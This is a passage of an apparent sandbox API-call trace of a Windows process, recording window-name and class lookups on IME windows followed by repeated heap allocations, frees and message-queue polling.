11 [0121.609] GetClassNameW (in: hWnd=0x1030e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.609] GetWindowTextW (in: hWnd=0x1030c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.609] GetClassNameW (in: hWnd=0x1030c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.610] GetWindowTextW (in: hWnd=0x1030a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.610] GetClassNameW (in: hWnd=0x1030a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.610] GetWindowTextW (in: hWnd=0x10312, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.610] GetClassNameW (in: hWnd=0x10312, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.610] GetWindowTextW (in: hWnd=0x20208, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.610] GetClassNameW (in: hWnd=0x20208, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.611] GetWindowTextW (in: hWnd=0x1027a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.611] GetClassNameW (in: hWnd=0x1027a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.611] GetWindowTextW (in: hWnd=0x10278, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.611] GetClassNameW (in: hWnd=0x10278, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.611] GetWindowTextW (in: hWnd=0x10276, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.611] GetClassNameW (in: hWnd=0x10276, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.611] GetWindowTextW (in: hWnd=0x10274, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.611] GetClassNameW (in: hWnd=0x10274, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.612] GetWindowTextW (in: hWnd=0x20202, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.612] GetClassNameW (in: hWnd=0x20202, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.612] GetWindowTextW (in: hWnd=0x10272, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.612] GetClassNameW (in: hWnd=0x10272, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.612] GetWindowTextW (in: hWnd=0x10270, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.612] GetClassNameW (in: hWnd=0x10270, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.613] GetWindowTextW (in: hWnd=0x1026e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.613] GetClassNameW (in: hWnd=0x1026e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.613] GetWindowTextW (in: hWnd=0x1025e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.613] GetClassNameW (in: hWnd=0x1025e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.613] GetWindowTextW (in: hWnd=0x10250, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.613] GetClassNameW (in: hWnd=0x10250, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.613] GetWindowTextW (in: hWnd=0x1024a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.614] GetClassNameW (in: hWnd=0x1024a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.614] GetWindowTextW (in: hWnd=0x10248, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.614] GetClassNameW (in: hWnd=0x10248, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.614] GetWindowTextW (in: hWnd=0x10246, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.614] GetClassNameW (in: hWnd=0x10246, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.615] GetWindowTextW (in: hWnd=0x10238, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.615] GetClassNameW (in: hWnd=0x10238, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.615] GetWindowTextW (in: hWnd=0x10228, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.615] GetClassNameW (in: hWnd=0x10228, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.615] GetWindowTextW (in: hWnd=0x10220, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.617] GetClassNameW (in: hWnd=0x10220, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.617] GetWindowTextW (in: hWnd=0x1021c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.618] GetClassNameW (in: hWnd=0x1021c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.618] GetWindowTextW (in: hWnd=0x10212, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.622] GetClassNameW (in: hWnd=0x10212, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.622] GetWindowTextW (in: hWnd=0x10210, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.622] GetClassNameW (in: hWnd=0x10210, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.623] GetWindowTextW (in: hWnd=0x40194, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.623] GetClassNameW (in: hWnd=0x40194, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.623] GetWindowTextW (in: hWnd=0x101c0, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.623] GetClassNameW (in: hWnd=0x101c0, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.623] GetWindowTextW (in: hWnd=0x101a8, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.624] GetClassNameW (in: hWnd=0x101a8, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.624] GetWindowTextW (in: hWnd=0x10190, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.624] GetClassNameW (in: hWnd=0x10190, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.624] GetWindowTextW (in: hWnd=0x100f6, lpString=0x7deed0, nMaxCount=1024 | out: lpString="MSCTFIME UI") returned 11 [0121.624] GetClassNameW (in: hWnd=0x100f6, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="MSCTFIME UI") returned 11 [0121.625] GetWindowTextW (in: hWnd=0x100f2, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.625] GetClassNameW (in: hWnd=0x100f2, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.625] GetWindowTextW (in: hWnd=0x100e8, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.625] GetClassNameW (in: hWnd=0x100e8, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.625] GetWindowTextW (in: hWnd=0x100dc, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.625] GetClassNameW (in: hWnd=0x100dc, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.625] GetWindowTextW (in: hWnd=0x401ea, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.626] GetClassNameW (in: hWnd=0x401ea, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.626] GetWindowTextW (in: hWnd=0x2003c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.626] GetClassNameW (in: hWnd=0x2003c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.628] GetWindowTextW (in: hWnd=0x101ca, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.629] GetClassNameW (in: hWnd=0x101ca, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.629] GetWindowTextW (in: hWnd=0x10076, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.630] GetClassNameW (in: hWnd=0x10076, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7a8 | out: hHeap=0x12c0000) returned 1 [0121.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa00 | out: hHeap=0x12c0000) returned 1 [0121.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd868 | out: hHeap=0x12c0000) returned 1 [0121.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef970 | out: hHeap=0x12c0000) returned 1 [0121.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd958 | out: hHeap=0x12c0000) returned 1 [0121.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa10 | out: hHeap=0x12c0000) returned 1 [0121.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd790 | out: hHeap=0x12c0000) returned 1 [0121.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8e0 | out: hHeap=0x12c0000) returned 1 [0121.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff348 | out: hHeap=0x12c0000) returned 1 [0121.631] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.631] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef940 [0121.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa00 [0121.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a18 [0121.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a18 | out: hHeap=0x12c0000) returned 1 [0121.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa00 | out: hHeap=0x12c0000) returned 1 [0121.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0121.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a98 [0121.632] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a98 | out: hHeap=0x12c0000) returned 1 [0121.632] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef950 [0121.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa80 [0121.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491878 [0121.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491878 | out: hHeap=0x12c0000) returned 1 [0121.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa80 | out: hHeap=0x12c0000) returned 1 [0121.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef950 | out: hHeap=0x12c0000) returned 1 [0121.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.632] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.632] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9f0 [0121.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef900 [0121.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a98 [0121.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a98 | out: hHeap=0x12c0000) returned 1 [0121.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef900 | out: hHeap=0x12c0000) returned 1 [0121.633] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9f0 | out: hHeap=0x12c0000) returned 1 [0121.633] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b98 [0121.633] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.633] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b98 | out: hHeap=0x12c0000) returned 1 [0121.633] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.633] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9f0 [0121.633] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa80 [0121.633] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b78 [0121.633] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b78 | out: hHeap=0x12c0000) returned 1 [0121.633] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa80 | out: hHeap=0x12c0000) returned 1 [0121.633] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9f0 | out: hHeap=0x12c0000) returned 1 [0121.633] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a98 [0121.633] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.633] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a98 | out: hHeap=0x12c0000) returned 1 [0121.633] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.634] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa80 [0121.634] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa90 [0121.634] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0121.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0121.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa90 | out: hHeap=0x12c0000) returned 1 [0121.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa80 | out: hHeap=0x12c0000) returned 1 [0121.634] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d18 [0121.634] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d18 | out: hHeap=0x12c0000) returned 1 [0121.634] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.634] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef970 [0121.634] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa10 [0121.634] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491998 [0121.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491998 | out: hHeap=0x12c0000) returned 1 [0121.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa10 | out: hHeap=0x12c0000) returned 1 [0121.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef970 | out: hHeap=0x12c0000) returned 1 [0121.635] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b98 [0121.635] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b98 | out: hHeap=0x12c0000) returned 1 [0121.635] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.635] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efab0 [0121.635] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa80 [0121.635] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918b8 [0121.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918b8 | out: hHeap=0x12c0000) returned 1 [0121.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa80 | out: hHeap=0x12c0000) returned 1 [0121.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efab0 | out: hHeap=0x12c0000) returned 1 [0121.635] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.635] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.635] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef970 [0121.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8f0 [0121.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491af8 [0121.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491af8 | out: hHeap=0x12c0000) returned 1 [0121.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8f0 | out: hHeap=0x12c0000) returned 1 [0121.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef970 | out: hHeap=0x12c0000) returned 1 [0121.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458cd8 [0121.636] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458cd8 | out: hHeap=0x12c0000) returned 1 [0121.636] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa60 [0121.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef910 [0121.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491818 [0121.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491818 | out: hHeap=0x12c0000) returned 1 [0121.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef910 | out: hHeap=0x12c0000) returned 1 [0121.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa60 | out: hHeap=0x12c0000) returned 1 [0121.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d58 [0121.637] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d58 | out: hHeap=0x12c0000) returned 1 [0121.637] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef910 [0121.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9f0 [0121.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a18 [0121.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a18 | out: hHeap=0x12c0000) returned 1 [0121.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9f0 | out: hHeap=0x12c0000) returned 1 [0121.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef910 | out: hHeap=0x12c0000) returned 1 [0121.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a18 [0121.637] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a18 | out: hHeap=0x12c0000) returned 1 [0121.637] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8f0 [0121.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef900 [0121.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491918 [0121.638] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491918 | out: hHeap=0x12c0000) returned 1 [0121.638] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef900 | out: hHeap=0x12c0000) returned 1 [0121.638] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8f0 | out: hHeap=0x12c0000) returned 1 [0121.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x14589d8 [0121.638] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.638] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14589d8 | out: hHeap=0x12c0000) returned 1 [0121.638] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8f0 [0121.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efab0 [0121.639] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0121.639] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0121.639] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efab0 | out: hHeap=0x12c0000) returned 1 [0121.639] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8f0 | out: hHeap=0x12c0000) returned 1 [0121.639] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458ed8 [0121.639] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.639] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ed8 | out: hHeap=0x12c0000) returned 1 [0121.639] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.639] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa60 [0121.639] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9c0 [0121.639] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b78 [0121.639] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b78 | out: hHeap=0x12c0000) returned 1 [0121.639] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9c0 | out: hHeap=0x12c0000) returned 1 [0121.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa60 | out: hHeap=0x12c0000) returned 1 [0121.640] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458998 [0121.640] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458998 | out: hHeap=0x12c0000) returned 1 [0121.640] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.640] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.640] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff460 [0121.640] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd790 [0121.640] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef960 [0121.640] HeapFree (in: hHeap=0x12c0000, 